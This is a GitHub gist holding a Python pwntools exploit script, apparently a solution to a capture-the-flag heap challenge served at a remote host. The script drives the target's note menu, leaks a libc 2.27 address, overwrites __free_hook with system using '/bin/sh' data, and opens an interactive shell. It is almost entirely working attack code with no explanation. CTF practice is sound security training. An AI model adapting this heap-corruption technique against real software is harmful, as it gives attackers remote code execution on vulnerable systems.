Created
October 25, 2020 13:16
-
-
Save hkraw/1dde915318f5da6a9269d2353b19f9ee to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
from pwn import * | |
from past.builtins import xrange | |
from time import sleep | |
from math import gamma | |
import subprocess | |
import random | |
#Utils | |
def createnote(size): | |
io.sendlineafter('>> ','1') | |
io.sendlineafter('note:\n',f'{size}') | |
def edit(index,numbers): | |
io.sendlineafter('>> ','3') | |
io.sendlineafter('edit:\n',f'{index}') | |
for i in range(len(numbers)): | |
io.sendlineafter(': ',f'{numbers[i]}') | |
if i==len(numbers)-1: io.sendlineafter('n)\n','n') | |
else: io.sendlineafter('n)\n','y') | |
def itof(val): | |
file = open('f.js','wb') | |
f = b''' | |
var buf = new ArrayBuffer(8); | |
var f64_buf = new Float64Array(buf); | |
var u64_buf = new Uint32Array(buf); | |
function ftoi(val) { | |
f64_buf[0] = val; | |
return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); | |
} | |
function itof(val) { | |
u64_buf[0] = Number(val & 0xffffffffn); | |
u64_buf[1] = Number(val >> 32n); | |
return f64_buf[0]; | |
} | |
''' | |
f += f'\nconsole.log(itof({val}n));'.encode() | |
file.write(f) | |
file.close() | |
d = subprocess.check_output(['./d8','f.js']).strip() | |
return d.decode() | |
def ftoi(val): | |
file = open('i.js','wb') | |
f = b''' | |
var buf = new ArrayBuffer(8); | |
var f64_buf = new Float64Array(buf); | |
var u64_buf = new Uint32Array(buf); | |
function ftoi(val) { | |
f64_buf[0] = val; | |
return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); | |
} | |
function itof(val) { | |
u64_buf[0] = Number(val & 0xffffffffn); | |
u64_buf[1] = Number(val >> 32n); | |
return f64_buf[0]; | |
} | |
''' | |
f += f'\nconsole.log(ftoi({val}));'.encode() | |
file.write(f) | |
file.close() | |
d = subprocess.check_output(['./d8','i.js']).strip() | |
return d.decode() | |
def view(idx): | |
io.sendlineafter('>> ','2') | |
io.sendlineafter('view:\n',f'{idx}') | |
return io.recvuntil('Choose your option:\n').strip() | |
def swap(idx,n1,n2): | |
io.sendlineafter('>> ','5') | |
io.sendlineafter('in:\n',f'{idx}') | |
io.sendlineafter('swap:\n',f'{n1}') | |
io.sendlineafter('with:\n',f'{n2}') | |
def delete(idx): | |
io.sendlineafter('>> ','4') | |
io.sendlineafter('delete:\n',f'{idx}') | |
#libc 2.27 | |
libc = ELF('./libc-2.27.so',checksec=False) | |
main_arena = 0x3ebc40 | |
system = 0x4f4e0 | |
__free_hook = 0x3ed8e8 | |
#Struct | |
''' | | | | | | |
--------------------------------- | |
0x10| size | numread | | |
0x18|*doublenote| - | | |
''' | |
if __name__ == '__main__': | |
# io = process('./D',env={'LD_PRELOAD':libc.path}) | |
io = remote('host1.metaproblems.com',5820) | |
createnote(0x418//8) #0 | |
createnote(0x18//8) #1 | |
createnote(0x18//8) #2 | |
edit(1,[itof(0x1337)]) | |
edit(0,[itof(0x461)]) | |
swap(0,1,0) | |
delete(0) | |
createnote(0x438//8) | |
libc_leak = int(ftoi(view(1).split(b': ')[1].split(b'\n')[0].decode()),0) | |
libc_base = libc_leak - main_arena - 0x60 | |
print(hex(libc_base)) | |
delete(0) | |
createnote(0x458//8) #0 | |
l = [] | |
for i in range(0x418//8): | |
l.append(0x2f62696e2f7368) | |
l.append(itof(0x21)) | |
l.append(itof(0x0000000000000003)) | |
l.append(itof(libc_base+__free_hook-0x8)) | |
edit(0,l) | |
edit(1,[itof(0x68732f6e69622f),itof(libc_base+system)]) | |
delete(1) | |
io.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment